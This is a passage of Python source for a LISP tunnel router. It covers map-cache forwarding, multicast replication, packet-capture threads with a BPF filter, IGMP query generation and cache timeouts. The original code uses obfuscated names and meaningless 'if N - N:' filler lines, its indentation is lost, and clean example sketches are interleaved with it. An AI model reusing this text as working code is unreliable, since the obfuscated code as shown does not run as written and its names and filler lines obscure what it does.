I11iiIi1i1 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( O0O0OOOOoo , None , None )
if 66 - 66: OoO0O00 * Oo0Ooo
O0O0oOOo0O . gleaned_dest = I11iiIi1i1
if 28 - 28: OoO0O00 % OoOoOO00 % I1ii11iIi11i + I1IiiI / I1IiiI
if 71 - 71: OOooOOo * OoO0O00 % OoooooooOO % OoO0O00 / I1IiiI
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
if 23 - 23: i11iIiiIii
o00oo0 = lisp . lisp_map_cache_lookup ( O0O0oOOo0O . inner_source , O0O0oOOo0O . inner_dest )
if ( o00oo0 ) : o00oo0 . add_recent_source ( O0O0oOOo0O . inner_source )
if 39 - 39: o0oOOo0O0Ooo - I1ii11iIi11i % iII111i * OoO0O00 - OOooOOo / iII111i
if 29 - 29: I1ii11iIi11i
if 52 - 52: i11iIiiIii / i1IIi
if 1 - 1: ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if ( o00oo0 and ( o00oo0 . action == lisp . LISP_NATIVE_FORWARD_ACTION or
o00oo0 . eid . address == 0 ) ) :
i1I1iIi1IiI = lisp . lisp_db_for_lookups . lookup_cache ( O0O0oOOo0O . inner_source , False )
if ( i1I1iIi1IiI and i1I1iIi1IiI . secondary_iid ) :
i1111 = O0O0oOOo0O . inner_dest
i1111 . instance_id = i1I1iIi1IiI . secondary_iid
if 82 - 82: ooOoO0o % Ii1I - ooOoO0o % OoOoOO00
o00oo0 = lisp . lisp_map_cache_lookup ( O0O0oOOo0O . inner_source , i1111 )
if ( o00oo0 ) :
O0O0oOOo0O . gleaned_dest = o00oo0 . gleaned
o00oo0 . add_recent_source ( O0O0oOOo0O . inner_source )
else :
I11iiIi1i1 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( i1111 , None ,
None )
O0O0oOOo0O . gleaned_dest = I11iiIi1i1
if ( o00oo0 == None and I11iiIi1i1 ) :
lisp . lprint ( "Suppress Map-Request for gleaned EID {}" . format ( lisp . green ( O0O0oOOo0O . inner_dest . print_address ( ) , False ) ) )
if 62 - 62: i1IIi + Oo0Ooo % IiII
return
if 28 - 28: I1ii11iIi11i . i1IIi
if 10 - 10: OoO0O00 / Oo0Ooo
if ( o00oo0 == None or lisp . lisp_mr_or_pubsub ( o00oo0 . action ) ) :
if ( lisp . lisp_rate_limit_map_request ( O0O0oOOo0O . inner_dest ) ) : return
if 15 - 15: iII111i . OoOoOO00 / iII111i * I11i - I1IiiI % I1ii11iIi11i
oo0OOOOOO0 = ( o00oo0 and o00oo0 . action == lisp . LISP_SEND_PUBSUB_ACTION )
lisp . lisp_send_map_request ( Oo0o , Ooo ,
O0O0oOOo0O . inner_source , O0O0oOOo0O . inner_dest , None , oo0OOOOOO0 )
if 26 - 26: iIii1I11I1II1
if ( O0O0oOOo0O . is_trace ( ) ) :
iiIii1ii = OOO0o0o
OOOo = "map-cache miss"
lisp . lisp_trace_append ( O0O0oOOo0O , reason = OOOo , lisp_socket = iiIii1ii )
if 79 - 79: OoOoOO00 % IiII % Oo0Ooo
return
if ( o00oo0 and o00oo0 . refresh ( ) ) :
if ( lisp . lisp_rate_limit_map_request ( O0O0oOOo0O . inner_dest ) == False ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( o00oo0 . print_eid_tuple ( ) , False ) ) )
if 89 - 89: II111iiii / oO0o
lisp . lisp_send_map_request ( Oo0o , Ooo ,
O0O0oOOo0O . inner_source , O0O0oOOo0O . inner_dest , None )
o00oo0 . last_refresh_time = time . time ( )
o00oo0 . stats . increment ( len ( O0O0oOOo0O . packet ) )
if 54 - 54: II111iiii . I11i
if 73 - 73: OoOoOO00 . I1IiiI
if 32 - 32: OoOoOO00 * I1IiiI % ooOoO0o * Ii1I . O0
if 48 - 48: iII111i * iII111i
I1I1 , iI1I1iiIi1I , I11iIiii1 , iIIIiiiI11I , I1ii1111Ii , i1I1iI1iIi111i = o00oo0 . select_rloc ( O0O0oOOo0O , None )
if 69 - 69: IiII . OoO0O00 + II111iiii
if 70 - 70: I1IiiI / I11i
if ( I1I1 == None and I1ii1111Ii == None ) :
if ( iIIIiiiI11I == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
O0O0oOOo0O . send_packet ( o0oOoO00o , O0O0oOOo0O . inner_dest )
if 28 - 28: I1ii11iIi11i * OoooooooOO . II111iiii / i11iIiiIii + oO0o
if ( O0O0oOOo0O . is_trace ( ) ) :
iiIii1ii = OOO0o0o
OOOo = "not an EID"
lisp . lisp_trace_append ( O0O0oOOo0O , reason = OOOo , lisp_socket = iiIii1ii )
if 38 - 38: IiII . Ii1I
OO0000o ( Iii1iiIi1II , "RTR" )
return
if 24 - 24: o0oOOo0O0Ooo - o0oOOo0O0Ooo + I1ii11iIi11i + I1IiiI - oO0o
OOOo = "No reachable RLOCs found"
lisp . dprint ( OOOo )
if 12 - 12: iII111i . IiII . OoOoOO00 / O0
if ( O0O0oOOo0O . is_trace ( ) ) :
iiIii1ii = OOO0o0o
lisp . lisp_trace_append ( O0O0oOOo0O , reason = OOOo , lisp_socket = iiIii1ii )
if 58 - 58: o0oOOo0O0Ooo - II111iiii % oO0o + I1Ii111 . OoOoOO00 / IiII
return
if 8 - 8: I1ii11iIi11i . OoO0O00 * I11i + II111iiii % i11iIiiIii
if ( I1I1 and I1I1 . is_null ( ) ) :
lisp . dprint ( "Drop action RLOC found" )
if 8 - 8: ooOoO0o * O0
if ( O0O0oOOo0O . is_trace ( ) ) :
iiIii1ii = OOO0o0o
OOOo = "drop action"
lisp . lisp_trace_append ( O0O0oOOo0O , reason = OOOo , lisp_socket = iiIii1ii )
if 73 - 73: o0oOOo0O0Ooo / oO0o / I11i / OoO0O00
return
if 11 - 11: OoOoOO00 + IiII - OoooooooOO / OoO0O00
if 34 - 34: ooOoO0o
if 45 - 45: ooOoO0o / Oo0Ooo / Ii1I
if 44 - 44: I1ii11iIi11i - Ii1I / II111iiii * OoO0O00 * Oo0Ooo
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
O0O0oOOo0O . outer_tos = O0O0oOOo0O . inner_tos
O0O0oOOo0O . outer_ttl = O0O0oOOo0O . inner_ttl
if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
if 58 - 58: I1IiiI - I1ii11iIi11i % O0 . I1IiiI % OoO0O00 % IiII
if 87 - 87: oO0o - i11iIiiIii
if ( I1I1 ) :
O0O0oOOo0O . encap_port = iI1I1iiIi1I
if ( iI1I1iiIi1I == 0 ) : O0O0oOOo0O . encap_port = lisp . LISP_DATA_PORT
O0O0oOOo0O . outer_dest . copy_address ( I1I1 )
ooOoO = O0O0oOOo0O . outer_dest . afi_to_version ( )
O0O0oOOo0O . outer_version = ooOoO
if 23 - 23: I11i
iIiiIiiIi = iIiiI1 if ( ooOoO == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 40 - 40: o0oOOo0O0Ooo
O0O0oOOo0O . outer_source . copy_address ( iIiiIiiIi )
if 78 - 78: iIii1I11I1II1
if ( O0O0oOOo0O . is_trace ( ) ) :
iiIii1ii = OOO0o0o
if ( lisp . lisp_trace_append ( O0O0oOOo0O , rloc_entry = i1I1iI1iIi111i ,
lisp_socket = iiIii1ii ) == False ) : return
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
if 6 - 6: IiII * i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + o0oOOo0O0Ooo / i1IIi
if 53 - 53: I11i + iIii1I11I1II1
if ( O0O0oOOo0O . encode ( I11iIiii1 ) == None ) : return
if ( len ( O0O0oOOo0O . packet ) <= 1500 ) : O0O0oOOo0O . print_packet ( "Send" , True )
if 70 - 70: I1ii11iIi11i
if 67 - 67: OoooooooOO
if 29 - 29: O0 - i11iIiiIii - II111iiii + OOooOOo * IiII
if 2 - 2: i1IIi - ooOoO0o + I1IiiI . o0oOOo0O0Ooo * o0oOOo0O0Ooo / OoOoOO00
oOOO = i1 if ooOoO == 6 else o0oOoO00o
O0O0oOOo0O . send_packet ( oOOO , O0O0oOOo0O . outer_dest )
if 16 - 16: oO0o + ooOoO0o / o0oOOo0O0Ooo
elif ( I1ii1111Ii ) :
if 82 - 82: IiII * i11iIiiIii % II111iiii - OoooooooOO
if 90 - 90: Oo0Ooo . oO0o * i1IIi - i1IIi
if 16 - 16: I1IiiI * i1IIi - o0oOOo0O0Ooo . IiII % I11i / o0oOOo0O0Ooo
if 14 - 14: iIii1I11I1II1 * I1Ii111 * I1ii11iIi11i / iIii1I11I1II1 * IiII / I11i
OOO000 = len ( O0O0oOOo0O . packet )
for Ii1 in I1ii1111Ii . rle_forwarding_list :
O0O0oOOo0O . outer_dest . copy_address ( Ii1 . address )
O0O0oOOo0O . encap_port = lisp . LISP_DATA_PORT if Ii1 . translated_port == 0 else Ii1 . translated_port
if 62 - 62: i1IIi - i1IIi
if 69 - 69: OoOoOO00 % oO0o - I11i
ooOoO = O0O0oOOo0O . outer_dest . afi_to_version ( )
O0O0oOOo0O . outer_version = ooOoO
if 38 - 38: iIii1I11I1II1 + i11iIiiIii / i11iIiiIii % OoO0O00 / ooOoO0o % Ii1I
iIiiIiiIi = iIiiI1 if ( ooOoO == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 7 - 7: IiII * I1IiiI + i1IIi + i11iIiiIii + Oo0Ooo % I1IiiI
O0O0oOOo0O . outer_source . copy_address ( iIiiIiiIi )
if 62 - 62: o0oOOo0O0Ooo - Ii1I * OoOoOO00 - i11iIiiIii % ooOoO0o
if ( O0O0oOOo0O . is_trace ( ) ) :
iiIii1ii = OOO0o0o
OOOo = "replicate"
if ( lisp . lisp_trace_append ( O0O0oOOo0O , reason = OOOo , lisp_socket = iiIii1ii ) == False ) : return
if 52 - 52: I1ii11iIi11i % oO0o - i11iIiiIii
if 30 - 30: iII111i / OoO0O00 + oO0o
if 6 - 6: iII111i . I11i + Ii1I . I1Ii111
if ( O0O0oOOo0O . encode ( None ) == None ) : return
if 70 - 70: OoO0O00
O0O0oOOo0O . print_packet ( "Replicate-to-L{}" . format ( Ii1 . level ) , True )
O0O0oOOo0O . send_packet ( o0oOoO00o , O0O0oOOo0O . outer_dest )
if 46 - 46: I11i - i1IIi
if 46 - 46: I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
oOo0OOoooO = len ( O0O0oOOo0O . packet ) - OOO000
O0O0oOOo0O . packet = O0O0oOOo0O . packet [ oOo0OOoooO : : ]
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
if ( lisp . lisp_flow_logging ) : O0O0oOOo0O = copy . deepcopy ( O0O0oOOo0O )
del ( O0O0oOOo0O )
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
OO0000o ( Iii1iiIi1II , "RTR" )
return
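#
# Hedged sketch of the RLE replication pattern used above for multicast map-
# cache entries: send one encapsulated copy per replication-list node, using
# the node's translated port when it sits behind a NAT. The node tuples and
# the send callable are illustrative placeholders, not the lispers.net API.
#
def _example_replicate(send, packet, rle_nodes, default_port=4341):
    for address, port in rle_nodes:             # each node: (address, port)
        port = port if port != 0 else default_port
        send(packet, (address, port))           # one copy per RLE node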
#
# Worker-thread loop: pull packets from this thread's input queue and run the
# main forwarding routine on each one.
#
def I1III111i ( lisp_thread ) :
lisp . lisp_set_exception ( )
while ( True ) :
if 4 - 4: i1IIi + ooOoO0o + i1IIi
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
O0O0oOOo0O = lisp_thread . input_queue . get ( )
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
lisp_thread . input_stats . increment ( len ( O0O0oOOo0O ) )
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
lisp_thread . lisp_packet . packet = O0O0oOOo0O
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
Ii1ii111i1 ( lisp_thread . lisp_packet , lisp_thread . thread_name )
if 47 - 47: oO0o % iIii1I11I1II1
return
#
# When several pcap threads capture the same traffic, a thread processes a
# packet only if the current second (mod pcap-thread count) selects it.
#
def II11i1IiIII ( thread ) :
oO00 = ( time . time ( ) % thread . number_of_pcap_threads )
return ( int ( oO00 ) == thread . thread_number )
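#
# The pcap threads all see the same captured traffic, so each one claims a
# packet only when the current second (mod thread count) selects it. A
# stand-alone sketch of that round-robin test (hypothetical name):
#
def _example_my_turn(thread_number, number_of_threads):
    import time
    return int(time.time() % number_of_threads) == thread_number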
#
# pcap callback: strip the datalink header, then hand the packet to a worker
# thread's queue, or process it inline when no worker threads are configured.
#
def i1iii1ii ( parms , not_used , packet ) :
if ( II11i1IiIII ( parms [ 1 ] ) == False ) : return
if 18 - 18: OoO0O00 . II111iiii % OoOoOO00 % Ii1I
oo0 = parms [ 0 ]
i1iIIi1II1iiI = parms [ 1 ]
III1Ii1i1I1 = i1iIIi1II1iiI . number_of_worker_threads
if 97 - 97: I1Ii111 . ooOoO0o - I1Ii111 + I1IiiI * II111iiii
i1iIIi1II1iiI . input_stats . increment ( len ( packet ) )
iIii1iII1Ii = 4 if oo0 == "lo0" else ( 14 if lisp . lisp_is_macos ( ) else 16 )
packet = packet [ iIii1iII1Ii : : ]
if 50 - 50: Ii1I
if 22 - 22: I11i * O0 . II111iiii - OoO0O00
if 90 - 90: oO0o
if 94 - 94: I11i / I1ii11iIi11i * I1Ii111 - OoOoOO00
if ( III1Ii1i1I1 ) :
I1Ii11II1I1 = i1iIIi1II1iiI . input_stats . packet_count % III1Ii1i1I1
I1Ii11II1I1 = I1Ii11II1I1 + ( len ( O0ooo00OOo00 ) - III1Ii1i1I1 )
IiI1iI1IiiIi1 = O0ooo00OOo00 [ I1Ii11II1I1 ]
IiI1iI1IiiIi1 . input_queue . put ( packet )
else :
i1iIIi1II1iiI . lisp_packet . packet = packet
Ii1ii111i1 ( i1iIIi1II1iiI . lisp_packet , i1iIIi1II1iiI . thread_name )
if 90 - 90: O0 + I11i - OoooooooOO . I11i
return
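#
# Hedged sketch of the hand-off above: strip the datalink header, then spread
# packets across worker queues by packet count so each worker sees roughly an
# equal share. The queue objects are assumed to provide Queue.put().
#
def _example_dispatch(packet, datalink_hdr_len, worker_queues, packet_count):
    inner = packet[datalink_hdr_len:]
    if worker_queues:
        worker_queues[packet_count % len(worker_queues)].put(inner)
    return inner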
#
# Packet-capture thread: build the pcap filter that matches LISP data and
# control traffic for this host's addresses (plus RLOC-probes and, when
# lisp-nat is enabled, all inbound traffic) and run the capture loop with
# pcappy (python2) or pcapy (python3).
#
def ii ( lisp_thread ) :
lisp . lisp_set_exception ( )
if ( lisp . lisp_myrlocs [ 0 ] == None ) : return
if 9 - 9: OoO0O00 * Ii1I % i1IIi % oO0o
oo0 = "lo0" if lisp . lisp_is_macos ( ) else "any"
if 53 - 53: oO0o * OoooooooOO . OoOoOO00
if 96 - 96: I1IiiI % i1IIi . o0oOOo0O0Ooo . O0
if 37 - 37: i1IIi - OOooOOo % OoooooooOO / OOooOOo % ooOoO0o
if 48 - 48: i11iIiiIii % oO0o
if 29 - 29: iII111i + i11iIiiIii % I11i
oOo00Ooo0o0 = getoutput ( "egrep 'lisp-nat = yes' ./lisp.config" )
oOo00Ooo0o0 = ( oOo00Ooo0o0 != "" and oOo00Ooo0o0 [ 0 ] == " " )
if 33 - 33: I11i
oOO0 = "(dst host "
IIi1I1i = ""
for iI1Iii in lisp . lisp_get_all_addresses ( ) :
oOO0 += "{} or " . format ( iI1Iii )
IIi1I1i += "{} or " . format ( iI1Iii )
if 13 - 13: iIii1I11I1II1 . OoOoOO00 * I1IiiI / oO0o * Ii1I
oOO0 = oOO0 [ 0 : - 4 ]
oOO0 += ") and ((udp dst port 4341 or 8472 or 4789) or "
oOO0 += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0))))"
IIi1I1i = IIi1I1i [ 0 : - 4 ]
oOO0 += ( " or (not (src host {}) and " + "((udp src port 4342 and ip[28] == 0x28) or " + "(udp dst port 4342 and ip[28] == 0x12)))" ) . format ( IIi1I1i )
if 31 - 31: I11i * OoOoOO00 . IiII % Ii1I + Oo0Ooo
if 47 - 47: O0 * I1IiiI * OoO0O00 . II111iiii
if 95 - 95: Ii1I % IiII . O0 % I1Ii111
if ( oOo00Ooo0o0 ) :
oOO0 += ( " or (dst net 0.0.0.0/0 and " + "not (host {} or src net 127.0.0.0/8))" ) . format ( IIi1I1i )
if 68 - 68: Oo0Ooo . Oo0Ooo - I1ii11iIi11i / I11i . ooOoO0o / i1IIi
if 12 - 12: I1ii11iIi11i * i1IIi * I11i
if 23 - 23: OOooOOo / O0 / I1IiiI
lisp . lprint ( "Capturing packets for: '{}'" . format ( oOO0 ) )
if 49 - 49: I11i . o0oOOo0O0Ooo % oO0o / Ii1I
if 95 - 95: O0 * OoOoOO00 * IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
if ( lisp . lisp_is_python2 ( ) ) :
II11I = pcappy . open_live ( oo0 , 9000 , 0 , 100 )
II11I . filter = oOO0
II11I . loop ( - 1 , i1iii1ii , [ oo0 , lisp_thread ] )
if 31 - 31: Ii1I
if ( lisp . lisp_is_python3 ( ) ) :
II11I = pcapy . open_live ( oo0 , 9000 , 0 , 100 )
II11I . setfilter ( oOO0 )
while ( True ) :
i11i11 , O0O0oOOo0O = II11I . next ( )
i1iii1ii ( [ oo0 , lisp_thread ] , None , O0O0oOOo0O )
if 18 - 18: ooOoO0o + Ii1I
if 5 - 5: OoooooooOO + I11i * II111iiii
return
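#
# A simplified sketch of the capture-filter string the function above builds:
# match LISP data/control ports for every local address. The address list is
# a plain list of strings here; RLOC-probe and lisp-nat clauses are omitted.
#
def _example_build_bpf_filter(local_addresses):
    dst_hosts = " or ".join(local_addresses)
    return ("(dst host {}) and "
            "((udp dst port 4341 or 8472 or 4789) or udp port 4342)"
            ).format(dst_hosts)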
#
# Data-encapsulate an IGMP query to the translated RLOC of a gleaned
# (EID, group) map-cache entry so the query reaches the receiver behind NAT.
#
def iIIiI11i1I11 ( lisp_raw_socket , eid , geid , igmp ) :
if 29 - 29: OoO0O00 * iIii1I11I1II1 * O0 - OoOoOO00 / IiII
if 99 - 99: ooOoO0o
if 76 - 76: OoO0O00
if 92 - 92: I11i - iIii1I11I1II1 % OoooooooOO
O0O0oOOo0O = lisp . lisp_packet ( igmp )
if 39 - 39: iII111i . I1IiiI * OoOoOO00 - i11iIiiIii
if 1 - 1: iII111i * OoOoOO00
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
o00oo0 = lisp . lisp_map_cache_lookup ( eid , geid )
if ( o00oo0 == None ) : return
if ( o00oo0 . rloc_set == [ ] ) : return
if ( o00oo0 . rloc_set [ 0 ] . rle == None ) : return
if 6 - 6: iIii1I11I1II1 * OoooooooOO
iIiI1I1ii1I1 = eid . print_address_no_iid ( )
for iiIi1IIi1I in o00oo0 . rloc_set [ 0 ] . rle . rle_nodes :
if ( iiIi1IIi1I . rloc_name == iIiI1I1ii1I1 ) :
O0O0oOOo0O . outer_dest . copy_address ( iiIi1IIi1I . address )
O0O0oOOo0O . encap_port = iiIi1IIi1I . translated_port
break
if 83 - 83: OOooOOo / O0 % iII111i - o0oOOo0O0Ooo . Oo0Ooo
if 49 - 49: iIii1I11I1II1 * i1IIi . OoooooooOO
if ( O0O0oOOo0O . outer_dest . is_null ( ) ) : return
if 90 - 90: o0oOOo0O0Ooo % I1ii11iIi11i - iIii1I11I1II1 % OoOoOO00
O0O0oOOo0O . outer_source . copy_address ( lisp . lisp_myrlocs [ 0 ] )
O0O0oOOo0O . outer_version = O0O0oOOo0O . outer_dest . afi_to_version ( )
O0O0oOOo0O . outer_ttl = 32
O0O0oOOo0O . inner_source . copy_address ( lisp . lisp_myrlocs [ 0 ] )
O0O0oOOo0O . inner_dest . store_address ( "[{}]224.0.0.1" . format ( geid . instance_id ) )
O0O0oOOo0O . inner_ttl = 1
if 8 - 8: OoOoOO00 * Oo0Ooo / IiII % Ii1I - I1IiiI
o000O0o = lisp . green ( eid . print_address ( ) , False )
OOOo = lisp . red ( "{}:{}" . format ( O0O0oOOo0O . outer_dest . print_address_no_iid ( ) ,
O0O0oOOo0O . encap_port ) , False )
oo0ooooo00o = lisp . bold ( "IGMP Query" , False )
if 78 - 78: iIii1I11I1II1 . o0oOOo0O0Ooo % iIii1I11I1II1 . O0 / OOooOOo
lisp . lprint ( "Data encapsulate {} to gleaned EID {}, RLOC {}" . format ( oo0ooooo00o , o000O0o , OOOo ) )
if 76 - 76: i1IIi * OoooooooOO * O0 + I1Ii111 * I1Ii111
if 35 - 35: o0oOOo0O0Ooo
if 73 - 73: O0 - I1ii11iIi11i
if 2 - 2: II111iiii / I1Ii111
if 54 - 54: i1IIi . I11i - I1ii11iIi11i + ooOoO0o + Oo0Ooo / Oo0Ooo
if ( O0O0oOOo0O . encode ( None ) == None ) : return
O0O0oOOo0O . print_packet ( "Send" , True )
if 22 - 22: ooOoO0o . iIii1I11I1II1
O0O0oOOo0O . send_packet ( lisp_raw_socket , O0O0oOOo0O . outer_dest )
#
# Build a general IGMP query (IPv4 header with router-alert option plus an
# IGMPv3 membership query) and send it to every gleaned group member whose
# glean-mapping has igmp-query enabled.
#
def IiIIiii1I ( lisp_raw_socket ) :
if ( lisp . lisp_gleaned_groups == { } ) : return
if 56 - 56: i11iIiiIii - iIii1I11I1II1 . II111iiii
if 81 - 81: IiII / OoOoOO00 * IiII . O0
if 61 - 61: OoO0O00 * OOooOOo + I1Ii111 . iIii1I11I1II1 % I11i . I1Ii111
if 53 - 53: I1Ii111 * IiII / iIii1I11I1II1 / I1IiiI % I1ii11iIi11i
if 39 - 39: OoO0O00 / OoooooooOO . OoO0O00 * I1ii11iIi11i / OoOoOO00
II111 = "\x46\xc0\x00\x24\x00\x00\x40\x00\x01\x02\x00\x00"
o0o0O0O000 = lisp . lisp_myrlocs [ 0 ]
Oo0OoO00oOO0o = o0o0O0O000 . address
II111 += chr ( ( Oo0OoO00oOO0o >> 24 ) & 0xff )
II111 += chr ( ( Oo0OoO00oOO0o >> 16 ) & 0xff )
II111 += chr ( ( Oo0OoO00oOO0o >> 8 ) & 0xff )
II111 += chr ( Oo0OoO00oOO0o & 0xff )
II111 += "\xe0\x00\x00\x01"
II111 += "\x94\x04\x00\x00"
II111 = lisp . lisp_ip_checksum ( II111 , 24 )
if 24 - 24: ooOoO0o / iII111i + IiII . IiII
if 39 - 39: ooOoO0o + O0 / i1IIi % IiII / oO0o * IiII
if 77 - 77: IiII . I1Ii111 % OoOoOO00
if 42 - 42: IiII % iII111i % o0oOOo0O0Ooo % oO0o + I11i % OoOoOO00
if 3 - 3: oO0o
iiii1I1 = "\x11\x64\x00\x00" + "\x00\x00\x00\x00" + "\x02\x3c\x00\x00"
iiii1I1 = lisp . lisp_igmp_checksum ( iiii1I1 )
if 64 - 64: OoO0O00 . I1IiiI - OoooooooOO . ooOoO0o - iII111i
if 77 - 77: Ii1I % OoOoOO00 / II111iiii % iII111i % OoooooooOO % OoO0O00
if 19 - 19: IiII * I1Ii111 / oO0o * I1Ii111 - OoooooooOO * I11i
if 17 - 17: II111iiii + Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
o00oO0oo0OO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
i1OOO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 29 - 29: IiII . ooOoO0o - II111iiii
for Ii1iIiII1ii1 in lisp . lisp_gleaned_groups :
o00oO0oo0OO . store_address ( Ii1iIiII1ii1 )
for ooooO0 in lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] :
i1OOO . store_address ( ooooO0 )
oO00oo0o00o0o , IiIIIIIi , Iiii111 = lisp . lisp_allow_gleaning ( o00oO0oo0OO , i1OOO , None )
if ( Iiii111 == False ) : continue
iIIiI11i1I11 ( lisp_raw_socket , o00oO0oo0OO , i1OOO , II111 + iiii1I1 )
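#
# Hedged sketch (stdlib only) of the 12-byte IGMP general query assembled
# above: type 0x11, max-response-time 100, zero checksum placeholder, group
# 0.0.0.0, then the IGMPv3 QRV/QQIC/source-count trailer. The checksum is
# left at zero here; the real code fills it with a one's-complement sum.
#
def _example_igmp_general_query():
    import struct
    return struct.pack("!BBH4sBBH", 0x11, 0x64, 0, b"\x00" * 4, 0x02, 0x3c, 0)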
#
# Time out gleaned multicast group state that has not been refreshed within
# LISP_IGMP_TIMEOUT_INTERVAL and remove the corresponding RLE entries.
#
def o0OO00oo0O ( ) :
o00oO0oo0OO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
i1OOO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 46 - 46: i11iIiiIii - OOooOOo * I1IiiI * I11i % I1ii11iIi11i * i1IIi
Iii1I = [ ]
for Ii1iIiII1ii1 in lisp . lisp_gleaned_groups :
for ooooO0 in lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] :
i1i1i1i1IiII1 = lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] [ ooooO0 ]
II1 = time . time ( ) - i1i1i1i1IiII1
if ( II1 < lisp . LISP_IGMP_TIMEOUT_INTERVAL ) : continue
Iii1I . append ( [ Ii1iIiII1ii1 , ooooO0 ] )
Ii11ii1I1 = lisp . bold ( "timed out" , False )
for Ii1iIiII1ii1 , ooooO0 in Iii1I :
o00oO0oo0OO . store_address ( Ii1iIiII1ii1 )
i1OOO . store_address ( ooooO0 )
o000O0o = lisp . green ( Ii1iIiII1ii1 , False )
Ii = lisp . green ( ooooO0 , False )
lisp . lprint ( "{} RLE {} for gleaned group {}" . format ( o000O0o , Ii11ii1I1 , Ii ) )
lisp . lisp_remove_gleaned_multicast ( o00oO0oo0OO , i1OOO )
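#
# Stand-alone sketch of the timeout sweep above: collect (eid, group) pairs
# whose last-seen timestamp is older than the interval, then delete them in a
# second pass so the dictionary is not mutated while it is being walked. The
# argument is a plain {eid: {group: last_seen}} dict, not the lisp module's.
#
def _example_timeout_sweep(gleaned_groups, timeout_secs):
    import time
    now = time.time()
    expired = [(eid, grp) for eid, groups in gleaned_groups.items()
               for grp, last_seen in groups.items()
               if now - last_seen >= timeout_secs]
    for eid, grp in expired:
        del gleaned_groups[eid][grp]
    return expired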
#
# Periodic (60-second) housekeeping timer: release nonce-keyed crypto state,
# time out map-cache and NAT-trace caches, expire gleaned groups, send IGMP
# queries, then re-arm the timer.
#
def ii1I ( lisp_raw_socket ) :
lisp . lisp_set_exception ( )
if 61 - 61: iIii1I11I1II1 - I11i / iII111i * I11i % Ii1I % iII111i
if 63 - 63: OOooOOo % iIii1I11I1II1
if 20 - 20: OoO0O00 . I1IiiI * i11iIiiIii / i11iIiiIii
if 89 - 89: iII111i . i11iIiiIii * O0
for oO0OOOO0 in list ( lisp . lisp_crypto_keys_by_nonce . values ( ) ) :
for Iii in oO0OOOO0 : del ( Iii )
if 35 - 35: IiII . OoooooooOO / OOooOOo
lisp . lisp_crypto_keys_by_nonce . clear ( )
lisp . lisp_crypto_keys_by_nonce = { }
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
if 74 - 74: oO0o
if 34 - 34: iII111i
lisp . lisp_timeout_map_cache ( lisp . lisp_map_cache )
if 44 - 44: i1IIi % I1IiiI % o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo % OoooooooOO - Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
lisp . lisp_rtr_nat_trace_cache . clear ( )
lisp . lisp_rtr_nat_trace_cache = { }
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if 45 - 45: Ii1I - OOooOOo
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
